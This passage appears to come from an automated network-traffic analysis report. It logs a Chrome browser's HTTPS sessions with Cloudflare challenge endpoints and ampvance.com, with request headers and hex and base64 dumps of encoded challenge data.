                                                      Data Ascii: 4a68s5KRgpilx6SZmL6SnMKSts3Bt7fM1cWozJ7JrNPEw5/W37e/ub6/puLR6czg68fH7Nj22snO07by4f3O8MLbCALHyOoB3+vrBM3rDgYKFhQZ4QoGF/379RIWIvcdBRbyFfgS/h0GHhsrEhAUIRUADCYCKig3HhwgNSEMGDEONj1DKigfPkMHKkAhPQVEJAg3JitOE08+Ti5YMThDZTs/NDo3Z0JXRiliQWJcYXNKVS82OThuOHlVbTxrP
                                                      2024-03-05 13:23:24 UTC1369INData Raw: 70 35 2b 76 31 64 48 44 75 71 2b 6c 74 39 44 66 72 62 36 7a 32 71 79 36 35 62 71 79 33 62 2b 6e 33 62 66 58 71 64 79 74 35 4f 6e 72 34 4f 50 32 74 39 65 78 72 4f 65 32 75 4c 33 71 41 4c 7a 57 33 75 44 69 31 4e 2b 2f 36 64 62 34 44 65 37 6b 45 4f 73 49 44 51 76 79 38 77 72 57 35 42 76 4d 35 52 34 66 36 2b 6f 5a 2f 50 4d 55 46 42 38 53 42 51 59 42 42 76 67 42 2b 51 6b 4d 2b 51 45 4b 45 42 48 30 45 2b 34 45 4a 67 51 38 46 77 63 55 50 68 6e 36 47 51 34 38 4e 42 59 6d 41 7a 51 54 4c 51 52 4c 42 69 30 4c 44 68 38 78 44 78 51 6a 4e 52 4d 58 4a 7a 6b 58 47 43 73 39 47 78 73 76 51 52 39 56 4d 30 55 6a 57 44 64 4a 4a 31 34 37 54 53 74 64 4d 32 46 54 62 45 39 5a 4d 47 52 6e 4f 33 5a 66 62 46 39 4b 4f 48 5a 67 66 30 5a 61 64 46 78 39 5a 6d 74 47 52 6f 46 35 62 6d 4e
                                                      Data Ascii: p5+v1dHDuq+lt9Dfrb6z2qy65bqy3b+n3bfXqdyt5Onr4OP2t9exrOe2uL3qALzW3uDi1N+/6db4De7kEOsIDQvy8wrW5BvM5R4f6+oZ/PMUFB8SBQYBBvgB+QkM+QEKEBH0E+4EJgQ8FwcUPhn6GQ48NBYmAzQTLQRLBi0LDh8xDxQjNRMXJzkXGCs9GxsvQR9VM0UjWDdJJ147TStdM2FTbE9ZMGRnO3ZfbF9KOHZgf0ZadFx9ZmtGRoF5bmN
                                                      2024-03-05 13:23:24 UTC1369INData Raw: 4c 61 74 72 61 72 48 6e 72 57 62 7a 71 33 63 76 4c 75 78 36 4c 65 37 70 38 4f 71 75 75 6a 43 79 72 32 73 35 2b 72 31 39 4d 6a 5a 35 64 54 73 39 76 6e 67 33 74 58 35 30 67 58 66 2b 50 33 52 75 2f 66 67 43 74 62 41 77 66 37 74 37 4d 73 54 2f 67 77 57 39 65 2f 57 43 41 59 64 32 66 4d 65 2f 75 49 52 46 76 6e 64 35 67 66 6e 49 51 30 6f 4a 43 49 45 47 68 77 42 37 2f 4d 43 45 6a 51 59 4c 76 6b 6f 43 42 48 32 4c 53 41 41 51 6a 41 32 4f 77 45 62 52 54 6b 2f 42 54 30 71 54 68 42 50 4f 30 68 53 51 43 77 54 52 45 4a 5a 46 6a 42 61 4f 78 39 4d 47 79 77 66 59 45 52 67 49 7a 35 56 4b 47 46 4e 61 47 52 69 52 54 78 63 51 54 41 30 52 46 4a 30 57 47 34 36 61 45 68 52 4e 32 31 67 67 34 42 62 58 49 64 44 68 56 39 35 52 34 68 6b 68 30 6c 6d 5a 49 32 50 55 57 4a 52 61 49 6c 31
                                                      Data Ascii: LatrarHnrWbzq3cvLux6Le7p8OquujCyr2s5+r19MjZ5dTs9vng3tX50gXf+P3Ru/fgCtbAwf7t7MsT/gwW9e/WCAYd2fMe/uIRFvnd5gfnIQ0oJCIEGhwB7/MCEjQYLvkoCBH2LSAAQjA2OwEbRTk/BT0qThBPO0hSQCwTREJZFjBaOx9MGywfYERgIz5VKGFNaGRiRTxcQTA0RFJ0WG46aEhRN21gg4BbXIdDhV95R4hkh0lmZI2PUWJRaIl1
                                                      2024-03-05 13:23:24 UTC1369INData Raw: 66 52 6d 63 43 65 30 4b 62 55 78 74 2f 43 7a 4b 50 58 32 71 37 70 30 74 2f 53 76 73 6a 50 32 50 54 4f 75 4e 58 4d 38 4e 6e 65 75 63 34 45 38 4d 50 53 43 50 54 44 31 67 7a 6b 2f 73 54 35 43 64 41 46 45 2b 72 64 37 4e 62 6b 43 51 38 57 2f 50 6f 48 44 76 34 68 38 42 41 61 33 66 62 30 2b 53 58 68 48 67 77 74 41 78 77 42 42 2f 30 6a 42 43 48 39 4b 42 63 33 49 67 34 58 47 7a 41 37 50 41 39 43 4c 68 67 79 4a 68 6b 6e 4e 42 38 31 4b 68 73 36 4f 51 49 70 50 52 4d 71 49 46 55 50 4e 54 4a 48 4e 44 63 36 53 79 30 35 4c 31 4a 64 57 30 45 2f 4c 31 45 66 56 44 35 58 59 69 70 4c 62 47 70 74 4d 31 45 6e 56 47 46 49 64 6b 4a 78 53 6c 4e 4f 63 56 68 55 51 6b 46 69 62 55 39 38 59 6c 68 6a 61 6e 68 56 5a 32 35 38 59 57 74 79 66 30 39 4f 56 34 43 49 59 35 42 31 6e 46 79 66 6d
                                                      Data Ascii: fRmcCe0KbUxt/CzKPX2q7p0t/SvsjP2PTOuNXM8Nneuc4E8MPSCPTD1gzk/sT5CdAFE+rd7NbkCQ8W/PoHDv4h8BAa3fb0+SXhHgwtAxwBB/0jBCH9KBc3Ig4XGzA7PA9CLhgyJhknNB81Khs6OQIpPRMqIFUPNTJHNDc6Sy05L1JdW0E/L1EfVD5XYipLbGptM1EnVGFIdkJxSlNOcVhUQkFibU98YlhjanhVZ258YWtyf09OV4CIY5B1nFyfm
                                                      2024-03-05 13:23:24 UTC1369INData Raw: 48 32 4c 66 5a 71 72 71 34 37 73 36 6d 76 74 2f 74 35 4e 33 6e 73 73 4c 55 2b 4e 76 74 32 66 37 70 74 74 55 45 32 4e 66 5a 42 4d 47 2b 32 51 73 47 41 75 51 51 34 78 4c 72 46 4f 63 43 36 63 33 56 32 4d 73 62 38 42 58 34 44 4f 2f 5a 39 52 58 65 45 75 34 58 2b 74 34 42 4c 41 41 75 43 44 41 42 45 41 4d 67 38 79 49 56 37 51 7a 75 43 6a 73 32 4d 4f 2f 32 41 43 34 61 52 41 4d 32 47 45 63 6f 4f 69 6b 44 44 42 67 6c 54 79 55 77 4c 77 6f 6f 42 7a 4a 45 45 31 6b 70 53 56 49 57 4c 6b 35 57 54 69 74 52 58 6c 67 6d 5a 6b 63 66 4f 6c 39 6a 51 69 31 67 55 48 46 4e 59 6a 4e 43 4e 69 38 34 5a 6c 6c 6f 4f 46 6f 2b 4e 32 74 67 58 44 70 44 58 6a 78 36 57 56 35 4a 66 47 79 4e 61 58 35 50 58 31 70 4c 59 30 64 71 68 6c 4e 72 62 34 74 73 68 57 32 66 66 31 64 79 6c 35 6c 62 67 70
                                                      Data Ascii: H2LfZqrq47s6mvt/t5N3nssLU+Nvt2f7pttUE2NfZBMG+2QsGAuQQ4xLrFOcC6c3V2Msb8BX4DO/Z9RXeEu4X+t4BLAAuCDABEAMg8yIV7QzuCjs2MO/2AC4aRAM2GEcoOikDDBglTyUwLwooBzJEE1kpSVIWLk5WTitRXlgmZkcfOl9jQi1gUHFNYjNCNi84ZlloOFo+N2tgXDpDXjx6WV5JfGyNaX5PX1pLY0dqhlNrb4tshW2ff1dyl5lbgp
                                                      2024-03-05 13:23:24 UTC1369INData Raw: 70 61 36 71 30 71 6d 7a 79 39 44 33 7a 4f 33 53 2b 65 62 50 33 72 58 35 41 74 75 37 32 4e 50 61 76 66 4c 54 31 67 7a 32 32 2b 6a 46 7a 2b 66 73 46 50 33 53 36 78 67 43 39 2f 51 63 32 74 62 33 49 41 72 65 2b 69 51 66 47 76 49 6f 35 2f 66 2b 34 78 66 37 42 44 44 76 43 42 4d 79 48 76 49 4d 37 53 4d 51 44 6a 77 52 4c 68 2f 31 4f 69 41 61 2b 51 50 2b 4a 76 30 63 53 69 4d 43 49 53 51 70 54 6a 73 63 4a 6c 51 6f 56 69 38 51 51 79 51 78 46 44 45 30 4b 78 59 31 55 6b 4a 6b 4a 44 51 39 61 46 4e 61 53 32 77 72 54 45 6c 77 52 48 4a 48 4b 6a 52 4d 54 7a 42 6a 62 6c 56 36 5a 31 52 66 4e 6b 42 4d 59 7a 70 2b 50 32 43 49 63 33 70 58 51 6b 78 2b 59 6b 5a 51 67 6e 4b 55 56 49 70 76 55 49 4a 34 64 46 4a 63 61 48 64 57 6d 32 78 38 70 47 4e 6a 66 71 61 54 66 49 52 69 70 6d 4f
                                                      Data Ascii: pa6q0qmzy9D3zO3S+ebP3rX5Atu72NPavfLT1gz22+jFz+fsFP3S6xgC9/Qc2tb3IAre+iQfGvIo5/f+4xf7BDDvCBMyHvIM7SMQDjwRLh/1OiAa+QP+Jv0cSiMCISQpTjscJlQoVi8QQyQxFDE0KxY1UkJkJDQ9aFNaS2wrTElwRHJHKjRMTzBjblV6Z1RfNkBMYzp+P2CIc3pXQkx+YkZQgnKUVIpvUIJ4dFJcaHdWm2x8pGNjfqaTfIRipmO
                                                      2024-03-05 13:23:24 UTC1369INData Raw: 39 33 6a 73 75 44 55 2b 75 50 54 32 62 58 71 2b 64 67 45 37 76 44 32 76 77 44 66 32 77 73 47 2f 50 55 41 79 74 72 73 45 66 73 4f 38 51 33 58 45 65 6b 49 32 68 4c 31 49 4e 38 4e 45 79 50 7a 31 75 30 5a 35 76 59 64 34 76 73 64 36 69 58 75 4b 53 41 75 43 53 7a 30 4a 68 6b 4b 2b 43 38 30 48 42 6f 7a 2f 54 6b 7a 51 68 6b 62 2f 45 59 77 4b 43 59 35 52 6b 46 42 54 6a 73 63 4b 46 4d 6e 51 53 42 58 51 44 67 6e 45 6a 46 4f 4c 6c 6f 64 51 45 45 62 4a 46 49 2b 48 6c 4a 48 58 53 4d 38 52 44 39 6d 57 6b 39 62 62 32 78 4d 51 6e 68 78 56 45 6f 30 63 69 39 47 63 54 39 50 64 44 74 56 67 55 4e 39 52 32 52 69 6a 46 39 6f 64 6f 5a 6c 61 31 79 54 66 48 42 6a 6d 4a 4b 4a 56 49 6d 57 6b 5a 43 65 69 32 79 44 6f 33 65 52 6d 46 39 6f 6c 6f 6c 69 70 70 71 47 73 4a 71 50 70 57 75 45
                                                      Data Ascii: 93jsuDU+uPT2bXq+dgE7vD2vwDf2wsG/PUAytrsEfsO8Q3XEekI2hL1IN8NEyPz1u0Z5vYd4vsd6iXuKSAuCSz0JhkK+C80HBoz/TkzQhkb/EYwKCY5RkFBTjscKFMnQSBXQDgnEjFOLlodQEEbJFI+HlJHXSM8RD9mWk9bb2xMQnhxVEo0ci9GcT9PdDtVgUN9R2RijF9odoZla1yTfHBjmJKJVImWkZCei2yDo3eRmF9ololippqGsJqPpWuE
                                                      2024-03-05 13:23:24 UTC1369INData Raw: 62 30 31 66 37 35 2b 64 48 32 2b 66 4f 37 42 2b 66 78 32 50 67 43 41 64 55 42 7a 4e 72 6d 45 2f 50 39 35 41 62 32 47 65 67 49 45 74 58 75 48 76 44 72 37 64 6e 33 46 75 33 65 2f 41 50 36 4b 75 62 2b 2f 68 30 42 42 79 41 6b 48 69 6b 45 4e 76 49 57 2b 43 72 31 2b 52 4d 76 4b 68 73 61 51 68 6b 51 46 6b 63 5a 51 53 4d 44 49 42 63 4c 53 69 56 4a 48 55 55 4f 56 52 35 48 54 7a 4d 32 53 79 73 54 4c 31 46 4b 55 55 70 55 48 79 39 42 5a 55 6c 41 52 6c 39 6a 53 46 5a 68 4c 31 31 4c 59 6d 6f 7a 55 6d 59 33 56 31 56 36 4f 45 74 5a 62 45 38 7a 55 6e 64 76 58 31 6d 47 61 57 42 5a 65 47 78 38 52 48 78 4c 67 56 79 45 5a 48 4e 72 69 32 31 79 54 4a 70 39 64 47 32 50 63 46 6c 68 6c 56 39 76 65 35 64 34 6b 58 6d 64 70 34 64 37 72 70 47 49 67 61 4f 55 66 35 43 6e 6c 37 68 36 63
                                                      Data Ascii: b01f75+dH2+fO7B+fx2PgCAdUBzNrmE/P95Ab2GegIEtXuHvDr7dn3Fu3e/AP6Kub+/h0BByAkHikENvIW+Cr1+RMvKhsaQhkQFkcZQSMDIBcLSiVJHUUOVR5HTzM2SysTL1FKUUpUHy9BZUlARl9jSFZhL11LYmozUmY3V1V6OEtZbE8zUndvX1mGaWBZeGx8RHxLgVyEZHNri21yTJp9dG2PcFlhlV9ve5d4kXmdp4d7rpGIgaOUf5Cnl7h6c


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.449764104.17.3.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:24 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:24 UTC386INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:23:24 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: V7miwAXM1+5T8eURCsEWOg==$auIiqvzTJKMHN6uo2zLAdQ==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b9eae701879-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:24 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:23:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.449771104.17.2.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:40 UTC918OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 30397
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: 2573fed2a68f8e4
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:40 UTC16384OUTData Raw: 76 5f 38 35 66 61 36 62 37 36 63 66 36 65 34 33 36 39 3d 35 64 34 51 37 38 4b 66 25 32 62 78 34 4b 34 38 2d 7a 6f 75 73 75 53 71 49 4b 47 65 66 7a 4f 75 7a 51 38 77 75 58 75 59 75 65 4a 38 6d 75 4c 75 53 4a 51 75 43 34 4e 75 78 51 4f 64 4b 6b 75 37 51 49 55 77 4b 6e 75 78 57 64 48 34 75 65 34 75 56 71 75 38 39 75 56 65 37 49 4b 73 75 71 56 58 24 75 7a 67 64 75 6f 78 53 59 74 2d 75 6a 51 7a 2d 75 76 52 70 6f 61 55 59 75 34 2b 50 75 67 74 73 76 30 75 7a 2d 59 67 4b 37 75 4b 64 4b 59 33 6e 6f 51 61 71 75 75 36 6e 4b 67 75 5a 61 38 61 75 4c 67 75 76 43 50 55 6c 48 57 6f 75 75 67 35 7a 51 75 69 75 71 77 2b 75 33 43 61 34 67 50 75 30 58 2b 39 2d 67 78 61 75 71 46 48 75 4b 50 75 30 4e 76 6b 58 49 51 43 57 51 4b 7a 2d 34 4b 36 7a 49 51 6b 57 2d 50 75 38 4d 49 49
                                                      Data Ascii: v_85fa6b76cf6e4369=5d4Q78Kf%2bx4K48-zousuSqIKGefzOuzQ8wuXuYueJ8muLuSJQuC4NuxQOdKku7QIUwKnuxWdH4ue4uVqu89uVe7IKsuqVX$uzgduoxSYt-ujQz-uvRpoaUYu4+Pugtsv0uz-YgK7uKdKY3noQaquu6nKguZa8auLguvCPUlHWouug5zQuiuqw+u3Ca4gPu0X+9-gxauqFHuKPu0NvkXIQCWQKz-4K6zIQkW-Pu8MII
                                                      2024-03-05 13:23:40 UTC14013OUTData Raw: 66 4a 68 39 36 2d 4c 48 55 24 75 41 51 76 64 71 4a 4c 2d 7a 4f 78 53 51 6e 44 4c 44 56 51 75 51 7a 34 75 55 75 2d 51 4c 2d 75 52 75 36 51 33 51 4b 6e 75 64 75 4e 75 71 6e 75 65 75 38 5a 53 41 55 72 51 38 70 76 33 75 4a 61 33 75 7a 4e 75 56 75 49 75 71 74 6f 44 4a 4c 41 64 37 51 4b 24 78 36 56 31 51 45 37 35 39 4e 73 2b 75 55 58 24 59 66 61 2b 51 6e 36 41 75 43 31 24 7a 72 75 52 75 57 75 2d 75 71 57 75 66 4a 53 4a 4b 33 4a 6b 75 2d 66 4b 2b 75 50 75 53 4a 4b 50 75 50 75 33 75 7a 68 61 72 6c 37 30 56 39 39 69 4e 78 68 76 6d 77 59 75 38 45 58 41 55 32 42 35 51 4c 34 58 6f 37 37 65 2b 42 61 36 4b 2d 4c 38 47 62 41 64 7a 51 37 58 42 71 6c 37 72 4b 36 49 4e 64 78 36 41 73 67 55 37 2b 63 77 33 61 5a 5a 4b 2b 41 78 30 79 65 6a 69 75 4d 61 6f 53 52 79 65 6f 43 31
                                                      Data Ascii: fJh96-LHU$uAQvdqJL-zOxSQnDLDVQuQz4uUu-QL-uRu6Q3QKnuduNuqnueu8ZSAUrQ8pv3uJa3uzNuVuIuqtoDJLAd7QK$x6V1QE759Ns+uUX$Yfa+Qn6AuC1$zruRuWu-uqWufJSJK3Jku-fK+uPuSJKPuPu3uzharl70V99iNxhvmwYu8EXAU2B5QL4Xo77e+Ba6K-L8GbAdzQ7XBql7rK6INdx6AsgU7+cw3aZZK+Ax0yejiuMaoSRyeoC1
                                                      2024-03-05 13:23:41 UTC1159INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:41 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-out: 3rLuS//9cixWwnHtBidEKrzHtwMMkc9hqGGPlLGppJeexfgNx03ocgGc90FHbegjIWePf8ueRifhxqhMNMmLubTg/g1fseRL+jhHif/QNHRY1UAV4CHUwr7Ob5R+oQjE$WiaMxReuNpUBT0y5Nskxtw==
                                                      cf-chl-out-s: VakYSt1Fc0yzoMTnCDHHBNJ7moPa4iyncYgph05DNz4PV5NJVhJexrsPXWH7DI73ICY0EGeVUyKf01Ed1WnpTupazvaBchK/W18kYtGkjFciuIOPAUh8+Baum/aZRhQPCy/SXIk444E+aL4klQReSpfIEM1FIuYcOq8oXxSMGZO6Aejfz2hCsAKCQQJ50DnDK3zp/9nUM6gTiozPfPxo1FVusKlfK4y8Gfu1zwwYeA/TrJy/b44qUpYK6QIu2y6m/u9ySB6v4BMtdul9thQyNJFTk1fAjDIJOUyefUQd93E7csChsPboi4ZMATlzfR7jofepCnfiRw6zSMp4Ab9TuHzGNFwd1JrW4giWK/SzvZn0hwkPAcmCreR3cZPpCZiQWc9nAZbOYzqqej94s9uDLhbWa7t5ejKEamCVZ1qWryS4mvTl4lUzRelbaHd7EtXYVv/WF4QdNAr/bTV103WtXYD1WxDI8Tq8xewV1XMy6al3iWhvgF1MEqffDXddRHLZOlNWWnXh4Exkls4zDILHVNPXORTagP07msKNa4ZPfArJNnHsGt4zuQPGS4Bo6BICJR3y3npbY1caGWhV+wKzoj/U6bCig7gsiSc7Ki5GbGBvQH6T9hPZEJLYoRNWgXPfJumnoeYGUCkFwVxtgBuAFe6A/0wvCDZBLiDjapFx14rRQNq5HuGdPCmaPZEiTTzPN12rho7DVc1fYE9EjfKubA==$Hho8hH7Pg0tDLJij9vZyJg==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c050e03c42f-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:41 UTC210INData Raw: 64 64 38 0d 0a 73 35 4b 52 67 70 69 6c 78 36 53 5a 6d 4c 36 53 6e 4d 4b 53 74 73 33 42 74 37 66 50 30 36 36 51 30 64 62 56 7a 64 4f 6b 30 38 62 64 34 63 66 48 33 36 69 37 74 75 47 71 38 63 48 6b 7a 65 58 6e 38 74 6e 58 30 50 62 79 7a 72 54 36 39 74 50 54 38 75 33 74 31 50 6e 6f 77 4f 6f 42 33 2b 76 72 41 66 44 4f 34 67 48 7a 30 64 55 4a 41 51 6e 61 36 65 33 57 31 68 4d 43 48 76 67 64 44 52 37 31 48 53 50 6b 43 79 45 6d 44 41 77 6b 41 65 6f 42 4a 43 6f 32 42 67 59 4b 36 2f 49 76 48 6a 6f 5a 4c 7a 64 43 48 6a 49 36 52 43 64 41 48 43 67 6f 50 51 6b 66 44 6b 45 35 43 79 4e 44 4a 46 59 6c 53 53 6b 52 4f 31 52 47 50 44 78 55 48
                                                      Data Ascii: dd8s5KRgpilx6SZmL6SnMKSts3Bt7fP066Q0dbVzdOk08bd4cfH36i7tuGq8cHkzeXn8tnX0PbyzrT69tPT8u3t1PnowOoB3+vrAfDO4gHz0dUJAQna6e3W1hMCHvgdDR71HSPkCyEmDAwkAeoBJCo2BgYK6/IvHjoZLzdCHjI6RCdAHCgoPQkfDkE5CyNDJFYlSSkRO1RGPDxUH
                                                      2024-03-05 13:23:41 UTC1369INData Raw: 54 51 68 57 45 30 77 55 68 39 6f 58 46 6f 31 57 6d 45 37 52 69 74 53 51 44 35 4e 4d 6d 56 68 62 56 64 70 5a 55 74 4e 53 44 78 61 64 6e 5a 67 55 31 52 50 56 6c 6b 38 53 49 74 6d 54 6e 42 75 66 6f 32 4c 54 47 35 69 54 35 69 45 6d 4a 74 56 69 56 35 35 58 5a 31 63 6f 33 68 7a 65 48 42 2f 69 6f 43 49 6e 59 6c 2f 66 4c 47 65 61 57 75 6d 69 4a 4f 49 65 4a 71 49 71 5a 61 55 6c 33 32 68 6e 5a 2b 57 72 6e 36 54 77 72 4b 37 75 4a 61 6f 6e 6f 61 67 75 4c 75 6a 6a 38 71 6c 73 35 50 58 78 4b 6e 4a 70 72 43 33 6e 63 47 39 76 37 62 51 77 4f 57 2f 30 38 54 72 71 73 69 2b 70 73 44 59 32 38 4f 75 78 75 6d 2b 34 75 48 6d 79 73 54 78 31 72 57 33 77 4f 6e 78 7a 50 6e 65 42 73 55 4a 42 66 33 4c 39 74 66 45 37 4e 72 48 79 51 2f 50 45 76 50 73 42 76 6e 35 38 4e 4c 6c 2f 66 54 57
                                                      Data Ascii: TQhWE0wUh9oXFo1WmE7RitSQD5NMmVhbVdpZUtNSDxadnZgU1RPVlk8SItmTnBufo2LTG5iT5iEmJtViV55XZ1co3hzeHB/ioCInYl/fLGeaWumiJOIeJqIqZaUl32hnZ+Wrn6TwrK7uJaonoaguLujj8qls5PXxKnJprC3ncG9v7bQwOW/08Trqsi+psDY28Ouxum+4uHmysTx1rW3wOnxzPneBsUJBf3L9tfE7NrHyQ/PEvPsBvn58NLl/fTW
                                                      2024-03-05 13:23:41 UTC1369INData Raw: 6b 62 61 31 51 6a 50 31 74 6b 61 56 74 62 64 48 52 4c 55 57 64 34 63 32 39 75 4e 7a 74 4a 57 48 78 74 64 33 34 39 57 33 39 33 68 59 56 49 64 34 4e 4c 67 6f 71 4b 55 55 53 54 6a 57 64 54 6c 31 4a 58 5a 59 69 59 63 32 6d 4b 57 6f 31 30 6e 61 42 37 65 5a 52 6a 6f 6e 69 6d 5a 34 43 41 61 36 71 70 73 36 52 75 6f 59 69 78 63 37 47 37 70 6e 5a 37 6c 4c 70 36 6b 34 43 74 66 70 70 2f 67 73 4b 48 6d 62 58 47 6f 36 47 2f 69 71 65 64 77 59 36 53 6b 4d 69 53 6d 64 76 4a 31 74 6d 78 7a 4e 72 5a 6f 70 58 62 74 37 7a 69 70 39 61 36 70 38 33 41 36 75 4c 66 30 63 33 63 35 73 61 32 78 74 6d 34 77 37 58 6e 38 76 4c 73 37 2b 44 33 7a 39 72 36 35 74 54 52 38 51 4c 33 2f 4f 4d 4c 41 4d 6a 38 38 66 48 6e 41 4f 45 43 34 52 6f 54 34 2f 45 66 2f 74 72 79 46 75 6f 50 44 68 49 48 38
                                                      Data Ascii: kba1QjP1tkaVtbdHRLUWd4c29uNztJWHxtd349W393hYVId4NLgoqKUUSTjWdTl1JXZYiYc2mKWo10naB7eZRjonimZ4CAa6qps6RuoYixc7G7pnZ7lLp6k4Ctfpp/gsKHmbXGo6G/iqedwY6SkMiSmdvJ1tmxzNrZopXbt7zip9a6p83A6uLf0c3c5sa2xtm4w7Xn8vLs7+D3z9r65tTR8QL3/OMLAMj88fHnAOEC4RoT4/Ef/tryFuoPDhIH8
                                                      2024-03-05 13:23:41 UTC603INData Raw: 43 62 79 39 7a 61 54 42 49 5a 30 39 34 54 53 78 32 64 56 46 33 65 58 31 54 4e 45 4a 2b 67 46 47 47 67 6e 4e 41 68 45 69 47 58 5a 43 51 55 56 32 52 6c 47 69 48 61 46 5a 76 67 33 79 62 58 49 64 75 58 6f 70 67 68 4b 4e 6c 65 5a 75 6c 70 70 70 72 61 4b 5a 38 73 47 79 71 68 4c 46 7a 6e 62 5a 74 75 62 57 69 75 57 35 7a 6b 48 71 38 72 5a 32 61 78 4a 65 45 76 73 6d 49 6c 62 2f 47 75 4a 79 50 6a 4c 75 6c 78 70 4b 4c 79 38 72 58 6d 4d 50 46 6d 4d 61 70 72 64 32 65 6e 4f 54 6a 30 74 72 6e 35 36 6a 66 32 4a 36 66 34 71 2f 76 37 75 2b 76 39 61 66 33 34 4b 2f 4c 35 2f 44 31 35 2b 63 42 41 64 66 64 38 77 55 41 2b 2f 72 44 78 39 58 6b 43 66 6b 45 43 38 6e 6e 44 41 51 53 45 74 51 45 45 4e 63 50 46 78 66 64 30 43 41 61 38 39 38 6b 33 75 50 78 46 53 55 41 39 52 66 6d 47 67
                                                      Data Ascii: Cby9zaTBIZ094TSx2dVF3eX1TNEJ+gFGGgnNAhEiGXZCQUV2RlGiHaFZvg3ybXIduXopghKNleZulpppraKZ8sGyqhLFznbZtubWiuW5zkHq8rZ2axJeEvsmIlb/GuJyPjLulxpKLy8rXmMPFmMaprd2enOTj0trn56jf2J6f4q/v7u+v9af34K/L5/D15+cBAdfd8wUA+/rDx9XkCfkEC8nnDAQSEtQEENcPFxfd0CAa898k3uPxFSUA9RfmGg
                                                      2024-03-05 13:23:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.449772104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:41 UTC1048OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1934419278:1709641400:nf2d9uXBpqI_eJS2Oi0Ck7HqLPnuP008yVnwRQOaiCc/85fa6b69aed817b1/8a01f925e609515 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      Content-Length: 3243
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      CF-Challenge: 8a01f925e609515
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ampvance.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ampvance.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
